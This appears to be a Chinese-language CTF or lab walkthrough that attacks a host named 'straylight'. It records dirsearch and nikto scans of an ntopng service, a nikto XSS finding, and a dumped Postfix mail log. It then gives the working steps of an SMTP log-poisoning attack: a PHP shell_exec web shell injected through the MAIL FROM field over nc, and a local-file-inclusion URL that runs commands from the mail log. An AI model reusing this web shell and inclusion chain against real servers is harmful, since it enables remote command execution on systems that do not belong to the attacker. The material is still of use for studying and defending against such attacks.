dirsearch -u 192.168.1.108:3000 nikto -host 192.168.1.108 -p 3000
1 2 3 4 5 6 7 8 9
hadoop-datanode Apache Hadoop http://192.168.1.108:3000/lua/login.lua?referer=/ + /666%0a%0a<script>alert('Vulnerable');</script>666.jsp: Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). http://192.168.1.108:3000/666%0a%0a<script>alert('Vulnerable');</script>666.jsp 上面这个XSS我验证不出来,这里我不是很懂,先跳过去
ntopng 是一个强大的网络流量监控工具,适用于需要对网络流量进行深入分析和实时监控的场景。它具有丰富的功能和易用的 Web 界面,广泛应用于网络运维、带宽管理、网络安全等领域。这个是个流量设备类似于IPS
<br/> Jul119:10:42 straylight postfix/postfix-script[1782]: stopping the Postfix mail system Jul119:10:42 straylight postfix/master[716]: terminating on signal 15 Jul119:10:43 straylight postfix/postfix-script[1945]: starting the Postfix mail system Jul119:10:43 straylight postfix/master[1947]: daemon started -- version 3.1.8, configuration /etc/postfix Jul320:26:50 straylight postfix/postfix-script[732]: starting the Postfix mail system Jul320:26:50 straylight postfix/master[734]: daemon started -- version 3.1.8, configuration /etc/postfix Nov2317:23:05 straylight postfix/postfix-script[804]: starting the Postfix mail system Nov2317:23:05 straylight postfix/master[822]: daemon started -- version 3.1.8, configuration /etc/postfix Nov2317:37:58 straylight postfix/postfix-script[725]: starting the Postfix mail system Nov2317:37:58 straylight postfix/master[727]: daemon started -- version 3.1.8, configuration /etc/postfix Nov2318:16:16 straylight postfix/smtpd[2926]: connect from unknown[192.168.1.240] Nov2318:16:16 straylight postfix/smtpd[2926]: lost connection after CONNECT from unknown[192.168.1.240] Nov2318:16:16 straylight postfix/smtpd[2926]: disconnect from unknown[192.168.1.240] commands=0/0 Nov2318:16:23 straylight postfix/smtpd[2926]: connect from unknown[192.168.1.240] Nov2318:16:23 straylight postfix/smtpd[2936]: connect from unknown[192.168.1.240] Nov2318:16:23 straylight postfix/smtpd[2937]: connect from unknown[192.168.1.240] Nov2318:16:23 straylight postfix/smtpd[2936]: SSL_accept error from unknown[192.168.1.240]: -1 Nov2318:16:23 straylight postfix/smtpd[2936]: warning: TLS library problem: error:1417D0FC:SSL routines:tls_process_client_hello:unknown protocol:../ssl/statem/statem_srvr.c:938: Nov2318:16:23 straylight postfix/smtpd[2936]: lost connection after STARTTLS from unknown[192.168.1.240] Nov2318:16:23 straylight postfix/smtpd[2936]: disconnect from unknown[192.168.1.240] ehlo=1 starttls=0/1 commands=1/2 Nov2318:16:24 straylight postfix/smtpd[2937]: disconnect from unknown[192.168.1.240] ehlo=1 quit=1 unknown=0/1 commands=2/3 Nov2318:16:24 straylight postfix/smtpd[2926]: lost connection after UNKNOWN from unknown[192.168.1.240] Nov2318:16:24 straylight postfix/smtpd[2926]: disconnect from unknown[192.168.1.240] ehlo=2 starttls=1 auth=0/1 unknown=0/1 commands=3/5 Nov2318:16:24 straylight postfix/smtpd[2937]: connect from unknown[192.168.1.240] Nov2318:16:24 straylight postfix/smtpd[2936]: connect from unknown[192.168.1.240] Nov2318:16:24 straylight postfix/smtpd[2926]: connect from unknown[192.168.1.240] Nov2318:16:24 straylight postfix/smtpd[2938]: connect from unknown[192.168.1.240] Nov2318:16:24 straylight postfix/smtpd[2926]: SSL_accept error from unknown[192.168.1.240]: lost connection Nov2318:16:24 straylight postfix/smtpd[2937]: SSL_accept error from unknown[192.168.1.240]: lost connection Nov2318:16:24 straylight postfix/smtpd[2937]: lost connection after STARTTLS from unknown[192.168.1.240] Nov2318:16:24 straylight postfix/smtpd[2937]: disconnect from unknown[192.168.1.240] ehlo=1 starttls=0/1 commands=1/2 Nov2318:16:24 straylight postfix/smtpd[2926]: lost connection after STARTTLS from unknown[192.168.1.240] Nov2318:16:24 straylight postfix/smtpd[2926]: disconnect from unknown[192.168.1.240] ehlo=1 starttls=0/1 commands=1/2 Nov2318:16:24 straylight postfix/smtpd[2938]: SSL_accept error from unknown[192.168.1.240]: lost connection Nov2318:16:24 straylight postfix/smtpd[2938]: lost connection after STARTTLS from unknown[192.168.1.240] Nov2318:16:24 straylight postfix/smtpd[2938]: disconnect from unknown[192.168.1.240] ehlo=1 starttls=0/1 commands=1/2 Nov2318:16:24 straylight postfix/smtpd[2936]: lost connection after STARTTLS from unknown[192.168.1.240] Nov2318:16:24 straylight postfix/smtpd[2936]: disconnect from unknown[192.168.1.240] ehlo=1 starttls=1 commands=2 Nov2318:16:24 straylight postfix/smtpd[2937]: connect from unknown[192.168.1.240] Nov2318:16:24 straylight postfix/smtpd[2937]: SSL_accept error from unknown[192.168.1.240]: lost connection Nov2318:16:24 straylight postfix/smtpd[2937]: lost connection after STARTTLS from unknown[192.168.1.240] Nov2318:16:24 straylight postfix/smtpd[2937]: disconnect from unknown[192.168.1.240] ehlo=1 starttls=0/1 commands=1/2 Nov2318:19:44 straylight postfix/anvil[2931]: statistics: max connection rate 9/60s for (smtp:192.168.1.240) at Nov 2318:16:24 Nov2318:19:44 straylight postfix/anvil[2931]: statistics: max connection count 4 for (smtp:192.168.1.240) at Nov 2318:16:24 Nov2318:19:44 straylight postfix/anvil[2931]: statistics: max cache size 1 at Nov 2318:16:16 Nov2400:22:33 straylight postfix/postfix-script[746]: starting the Postfix mail system Nov2400:22:33 straylight postfix/master[748]: daemon started -- version 3.1.8, configuration /etc/postfix
1 2 3 4 5 6 7 8
连接stmp服务器,然后发邮件,在收件人写入命令执行的代码 <?phpechoshell_exec($_GET['cmd']);?> nc 192.168.1.108 25 EHLO 命令:用于标识客户端,并获取 SMTP 服务的支持信息。 helo anonymous MAIL FROM 命令:指定发件人的邮件地址mail from: "anonymous <?phpechoshell_exec($_GET['cmd']);?>" //这里用eval传不了 RCPT TO 命令:指定收件人的邮件地址 rcpt to: root //这里的收信人必须是已知的,其他的我想不出来直接用root了 DATA 命令:开始输入邮件内容。 data 123456 输入.结束输入 发生成功 http://192.168.1.108/turing-bolo/bolo.php?bolo=../../../../var/log/mail&cmd=pwd //所有在日志文件里的命令执行都要用&